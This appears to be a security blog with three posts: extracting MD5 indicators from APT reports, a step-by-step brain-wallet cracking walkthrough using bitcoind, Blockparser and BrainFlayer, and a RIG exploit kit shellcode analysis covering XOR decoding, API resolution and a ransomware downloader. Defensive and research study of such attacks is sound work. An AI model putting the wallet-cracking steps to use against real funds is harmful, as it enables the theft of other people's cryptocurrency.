First, you can use a Python script to download all the reports into a central place, separated per year. Then you can use the IOC parser tool written by Armin Buescher. This tool is able to parse PDF reports and extract IOCs into CSV format. From there you can extract the relevant IOCs. For this example, I want to extract the MD5s and then use ioc_writer to create IOCs in OpenIOC 1.0/1.1 format, which can be used with a tool such as Redline. ioc_writer is a Python library written by William Gibb that allows you to manipulate IOCs in OpenIOC 1.1 and 1.0 format and was released at Black Hat 2013.

The steps necessary to perform this are illustrated below – for sure there are other, better ways to do the job, but this was a quick way to get it done.

extract-create-ioc
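A rough sketch of the extraction step – iocp's CSV column layout is an assumption here, so check your output before trusting the awk field numbers:

```
# parse a report and extract IOCs to CSV (ioc-parser by Armin Buescher)
python iocp.py -o csv report.pdf > report-iocs.csv
# pull out the unique MD5 values (field positions assumed)
awk -F'\t' '$3 == "MD5" {print $4}' report-iocs.csv | sort -u > md5s.txt
```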

With this we created a series of files with the .ioc extension that can be further edited with the ioc_writer Python library. However, not many tools support OpenIOC, so you might just take the MD5s and feed them into whatever tool or format you are using. You can download below the Excel file with all the MD5s separated per year. If you use them, please bear in mind that you might have false positives and you will need to go back to the CSV files to understand which report an MD5 came from. For example, I already removed a half dozen MD5s that are legitimate files seen in the reports, and also the MD5 of an empty file, “d41d8cd98f00b204e9800998ecf8427e”.

That's it. With this you can create a custom IOC set that contains MD5s of different tools, malware families and files, compiled by extracting the MD5s from the public reports about targeted attacks. From here you can start building more complex IOCs with different artifacts, based on a specific report or threat actor. Maybe you get lucky and find evil on your network!

The year 2010 contains 81 unique MD5’s.
The year 2011 contains 96 unique MD5’s.
The year 2012 contains 718 unique MD5’s.
The year 2013 contains 2149 unique MD5’s.
The year 2014 contains 1306 unique MD5’s.
The year 2015 contains 1553 unique MD5’s.
The year 2016 contains 1173 unique MD5’s.

Excel : md5-aptnotes-2010-2016


Blockchain & Brainwallet cracking

The blockchain is the underlying technology that enables the bitcoin cryptocurrency to exist. A foundational component of this technology is its complex cryptosystem. The blockchain cryptosystem relies on public key algorithms based on Elliptic Curve cryptography and message digest functions like SHA-256 and RIPEMD-160. When you create a bitcoin wallet, under the hood you are creating an Elliptic Curve key pair based on the Secp256k1 curve. The key pair has a private key and a public key. The private key is the one you keep secret; it allows you to sign transactions. For example, when you send bitcoins to someone, you sign the transaction with your private key and then announce it to the network. The miners will pick up your transaction, verify that the transaction signature is valid, and broadcast it to the network until enough miners have validated the transaction, thus achieving consensus. The checks and balances of the blockchain ledger are updated, and when consensus is achieved, your transaction is written in “digital stone”.

On the other hand, the public key is the one used to create your bitcoin wallet address. The public key allows you to receive bitcoins. However, your bitcoin wallet address is not your raw Elliptic Curve public key; there are additional steps performed to create an address. First, a digest of your public key is computed using SHA-256 followed by RIPEMD-160. Second, a byte with the network id is prepended to this string. Third, a checksum of this string is computed by performing SHA-256 twice, and the first 4 bytes of the result are appended to the string produced in the second step. Finally, this string is encoded in Base58, and this is your bitcoin wallet address. The picture below illustrates these steps in a non-automated way.

generatebitcoinaddr
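The hashing part of this pipeline can be reproduced with OpenSSL, assuming your build includes RIPEMD-160 – the Base58 encoding step is omitted, and the public key hex is a placeholder:

```
# SHA-256 then RIPEMD-160 over the raw public key bytes (the "hash160")
echo -n "$PUBKEY_HEX" | xxd -r -p | openssl dgst -sha256 -binary | openssl dgst -rmd160
```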

There are many ways to store your bitcoins, as well as to create wallets. One of the early methods to create bitcoin wallets was known as brain wallets. Unfortunately, this user-friendly method allowed you to enter a password or passphrase, which was then hashed using an algorithm such as SHA-256 and used as the seed to generate your private key. Due to their popularity and easy usage, many brain wallets were created in the last few years with weak passwords or passphrases, turning the wallet address hashes stored in the blockchain into crackable representations of those private keys. This weak way of generating your private key allowed attackers to steal your bitcoins just by performing password cracking against the hashes stored in the blockchain.
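To make the weakness concrete, the entire private key can be derived from a passphrase in one step – a sketch, not something to create a real wallet with:

```
# a brain wallet: the SHA-256 of the passphrase IS the private key
echo -n "correct horse battery staple" | sha256sum
```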

Although this attack has been known for years, it only became widely known recently due to the work done by Ryan Castellucci. Ryan released the results of his work on cracking brain wallets on 7th August 2015 at DEFCON 23, in conjunction with a tool called BrainFlayer: a proof-of-concept cracker for cryptocurrency brain wallets and other low entropy key algorithms. You can view Ryan’s talk here. Two months after Ryan's initial release of BrainFlayer, he released a faster version. This was the result of the work done by Nicolas Courtois and Guangyang Song of University College London together with Ryan to optimize the speed of computing the secp256k1 bitcoin elliptic curve, detailed in the IACR paper Speed Optimizations in Bitcoin Key Recovery Attacks. Furthermore, this year at the Financial Cryptography and Data Security conference, Marie Vasek presented another article, The Bitcoin Brain Drain: A Short Paper on the Use and Abuse of Bitcoin Brain Wallets. This paper published the results of evaluating 300 billion passwords against blockchain hashes, and its findings about 884 brain wallets that held funds at a given time suggest they might have been drained by active attackers.

So, how do you perform such attack?

The attempt to recover a password just by knowing its encrypted representation can be made mainly using three techniques. Dictionary attacks, the fastest method, consist of comparing dictionary words with the password hash. Another method is the brute force attack, which is the most powerful one, but the time it takes to recover the password might render the attack unfeasible; this is of course dependent on the complexity of the password and the chosen algorithm. Finally, there is the hybrid technique, which consists of combining words in a dictionary with word mangling rules.

With that being said, let’s go over the steps needed to perform this attack against the blockchain hash160 hashes using a dictionary. This is done in 6 steps:

  • Bootstrap the Blockchain.
  • Parse the Blockchain by running Blockparser and get allBalances.
  • Extract hash160 strings.
  • Create a Bloomfilter.
  • Run BrainFlayer with your favorite dictionary.
  • Use Addressgen to generate key pair.

The first step is to bootstrap the blockchain. To perform this, we need to download, install and run the bitcoin software on a system connected to the Internet. The system then becomes a node and part of the peer-to-peer blockchain network. The first task performed by the node is to download the entire database of records, i.e., the public transaction ledger, and verify it using the transaction engine. In other words, the node downloads the entire blockchain and verifies the validity of all blocks by performing a series of checks. This needs a lot of bandwidth and computing power. As I write this, the blockchain size is 90.633 GB and contains 438556 blocks. The data contains every transaction that has been made on the blockchain since the genesis block was created on the 3rd of January 2009 at 18:15:05 GMT. Downloading the entire blockchain took me more than 72 hours. The image below illustrates the steps needed to download, install and run the bitcoin software.

installbitcoin

Then, the picture below illustrates the steps needed to configure and run the bitcoin software. You can view the progress by executing the getblockchaininfo command and checking the number of blocks that have already been downloaded.

runbitcoin
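Roughly:

```
# start the node and let it sync the full chain (this takes days)
bitcoind -daemon
# check sync progress
bitcoin-cli getblockchaininfo
```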

After downloading the entire blockchain, we move to the second step: parsing the blockchain. The tool to perform this heavy lifting is called Blockparser, a powerful open source utility written in C++ by Znort987. The tool doesn’t seem to be maintained anymore but is still able to perform its work. When Blockparser performs the parsing, it creates and keeps the index in RAM, which means that with the current size of the blockchain you need enough RAM to be able to parse it in a reasonable amount of time. The tool can perform various tasks, but for this exercise we are interested in the allBalances command. To perform the parsing, I used a system with 64 GB of RAM and the process was smooth. I tried it on a system with 32 GB and stopped it due to the heavy swapping that was happening. The allBalances command produced a 30 GB text file. The image below exemplifies these steps.

blockchainparsing
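The invocation itself is simple:

```
# dump the balance (and hash160) of every address ever used
./parser allBalances > allBalances.txt
```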

The third step is to extract the hash160 addresses from the allBalances output. We are interested in the hash160 because this field contains the representation of the Bitcoin public key. Below you can see the output of allBalances.

allbalances
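From that output, something like the following would pull out the hash160 column – the field position is an assumption, so check it against the header of your allBalances output:

```
# extract the hash160 column and deduplicate
awk 'NR > 1 {print $2}' allBalances.txt | sort -u > hash160.txt
```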

In the fourth step, we create a bloom filter with the tool hex2blf, which is part of the BrainFlayer toolkit. We also need to create a binary file containing all the hashes, sorted, to be used together with the bloom filter; this will reduce the false positives.
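The bloom filter step, as a sketch:

```
# build a bloom filter from the hex-encoded hash160 list
hex2blf hash160.txt hash160.blf
```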

In the fifth step, we launch BrainFlayer using our favorite dictionary against the bloom filter file we generated in the previous step. If there is a match, you will see the password or passphrase and the corresponding hash. In the output of cracked passwords you will see a C or U in the second column; this indicates whether the key is Compressed or Uncompressed. In the image below you can see these steps.

brainflayer
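For example:

```
# test every candidate passphrase against the bloom filter of hash160s
brainflayer -v -b hash160.blf -i wordlist.txt > cracked.txt
```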

The sixth and last step is to create the Elliptic Curve key pair using the known password or passphrase. This can be done using the Addressgen tool created by sarchar. Addressgen is a utility written in Python 3 to generate private keys and their corresponding addresses using secp256k1. This utility will allow you to generate the ECDSA key pair, which can be used to take over the wallet.

generateaddress

Financial gain is a significant incentive that drives people to perform all kinds of activities in order to attempt to steal your coins. If you are interested in attacks against the blockchain, I would suggest looking at the different papers written by professor Nicolas Courtois and available on his website. On a different note, there are other researchers who are brute forcing the entire bitcoin private key keyspace in order to find private keys for addresses that have funds. One project, code-named Large Bitcoin Collider, is a distributed effort with a pool where people can contribute computing power. The thread on the Bitcointalk forum is quite interesting, and the author states the following aim for the project: “allow the Bitcoin community to actually have a better shot at risk assessment of this threat vector. Right now, the math says the danger is negligible. Should there at some point be evidence or indication of the contrary, then it’s still better to have a project like this for analysis/experimentation of this concrete attack vector”. The author also writes that the project is a derivative of BrainFlayer and supervanitygen. Moreover, BrainFlayer can also perform a brute force attack, sequentially, against the entire private key space. This would be unfeasible to perform in a reasonable time frame, but it is worth viewing the talk “Stealing Bitcoin with Math – HOPE XI”, given by Filippo Valsorda and Ryan, where among other things they show how quickly brain wallets get drained, attacks against newer brain wallet implementations, and other attacks against the Elliptic Curve Digital Signature Algorithm (ECDSA).


References:
Mastering Bitcoin – Unlocking Digital Cryptocurrencies by Andreas M. Antonopoulos

Tagged , , , ,

RIG Exploit Kit Analysis – Part 3

Over the course of the last two articles (part 1 & part 2), I analyzed a recent drive-by download campaign that was delivering the RIG Exploit Kit. In this article, I will complete the analysis by looking at the shellcode that is executed when the exploit code is successful. As mentioned in the previous articles, each of the two exploits has shellcode that is used to run malicious code on the victim's system. The shellcode objective is the same across the exploits: download, decrypt and execute the malware.

In part 1, when analyzing the JavaScript that was extracted from the RIG landing page, we saw that at the end there was a function that contained a hex string of 2505 bytes. This is the shellcode for the exploit CVE-2013-2551. In a similar way, but to exploit CVE-2015-5122, one of the decrypted strings inside DefineBinaryData tag 3 of the second stage Flash file contained a hex string of 2828 bytes.

So, how can we analyze this shellcode and determine what it does?

You can copy the shellcode and create a skeletal executable that can then be analyzed using a debugger or a disassembler. First, the shellcode needs to be converted into hex notation (\x). This can be done by copying the shellcode string into a file and then running a Perl one-liner. Then, generate the skeletal shellcode executable with the shellcode2exe.py script, written by Mario Villa and later tweaked by Anand Sastry. The result is a Windows executable for the x86 platform that can be loaded into a debugger. Another way to convert shellcode is to use the converter tool from http://www.kahusecurity.com.
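Cleaned up, the two commands from this step look like this:

```
# wrap each byte pair of the shellcode string in \x hex notation
cat shellcode | perl -pe 's/(..)/\\x$1/g' > shellcode.hex
# build a skeletal Windows executable around the shellcode
shellcode2exe.py -s shellcode shellcode.exe
```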

The next step is to load the generated executable into OllyDbg. Stepping through the code, one can see that the shellcode contains a deobfuscation routine. In this case, the shellcode author is using a XOR operation with the key 0x84. After looping through the routine, the decoded shellcode reveals a one-liner command line.

rigexshellcodeolly

After completing the XOR deobfuscation routine, the shellcode has to be able to dynamically resolve the Windows APIs in order to make the necessary system calls in the environment where it is being executed. To make system calls, the shellcode needs to know the memory address of the DLL that exports the required function. Popular API calls among shellcode writers are LoadLibrary and GetProcAddress. These common functions are used frequently because they are available in Kernel32.dll, which is almost certainly loaded into every Windows process. The author can then get the address of any user mode API call needed.

Therefore, the first step of the shellcode is to locate the base address of the memory image of Kernel32.dll. It then needs to scan its export table to locate the address of the functions needed.

How does the shellcode locate Kernel32.dll? On 32-bit systems, malware authors use a well-known technique that takes advantage of a structure that resides in memory and is available to all processes: the Process Environment Block (PEB). This structure, among other things, contains linked lists with information about the DLLs that have been loaded into memory. How do we access this structure? A pointer to the PEB resides inside another structure known as the Thread Information Block (TIB), which is always accessible via the FS segment register and can be found at FS:[0x30] (Zeltser, L.). Given the memory address of the PEB, the shellcode author can then browse through the different PEB linked lists, such as the InLoadOrderModuleList, which contains the list of DLLs that have been loaded by the process in load order. The third element of this list corresponds to Kernel32.dll. The code can then retrieve the base address of the DLL. This technique was pioneered by one of the members of the well-known and prominent virus and worm coder group 29A and written up in volume 6 of their e-zine in 2002. The figure below shows a snippet of the shellcode that contains the sequence of assembly instructions the code uses to find Kernel32.dll.

rigekshellcodeapildr

The next step is to retrieve the address of the required function. This can be obtained by navigating through the Export Directory Table of the DLL. In order to find the right API, the shellcode compares each export name against a string; when it matches, it fetches its location and proceeds. This technique was pioneered and is well described in the paper “Win32 Assembly Components”, written in 2002 by The Last Stage of Delirium Research Group (LSD). Finally, the code invokes the desired API. In this case, the shellcode uses the CreateProcessA API to spawn a new process that will carry out the command specified in the command line string.

rigekshellcodecreateproc

This command will launch a new instance of the Windows command interpreter, navigate to the user's %tmp% folder and then redirect a set of JavaScript commands to a file. Finally, it will invoke the Windows Script Host and launch this JavaScript file with two parameters: one is the decryption key and the other is the URL from where to fetch the malicious payload. Essentially, this shellcode is a downloader. The full command is shown in the figure below.

rigekshellcodedecoded

If the exploits are successful and the shellcode is executed, the payload is downloaded. In this case the payload is a variant of the Locky ransomware, and a user on a Windows 7 box would see the User Account Control dialog box popping up, asking to run it.

rigekuac

That’s it! We now have a better understanding of how this variant of the RIG Exploit Kit works, what it does and how. All stages of the RIG Exploit Kit enforce different protection mechanisms that slow down analysis, prevent code reuse and evade detection. It begins with multiple layers of obfuscated JavaScript, using junk code and string encoding, that hide the code logic and launch a browser exploit. Then it goes further by having multiple layers of encrypted Flash files with obfuscated ActionScript. The ActionScript is then responsible for invoking an exploit with encoded shellcode that downloads an encrypted payload. In addition, the modular backend framework allows the threat actors to use different distribution mechanisms to reach victims globally. Based on this modular backend, different filtering rules are enforced and different payloads can be delivered depending on the victim's geolocation, browser and operating system. This complexity makes these threats a very interesting case study and difficult to defend against. Against these capable and dynamic threats, no single solution is enough. The best strategy for defending against this type of attack is to understand it and to use a defense in depth strategy – multiple security controls at different layers.

References:

SANS FOR610: Reverse-Engineering Malware: Malware Analysis Tools and Techniques
Neutrino Exploit Kit Analysis and Threat Indicators
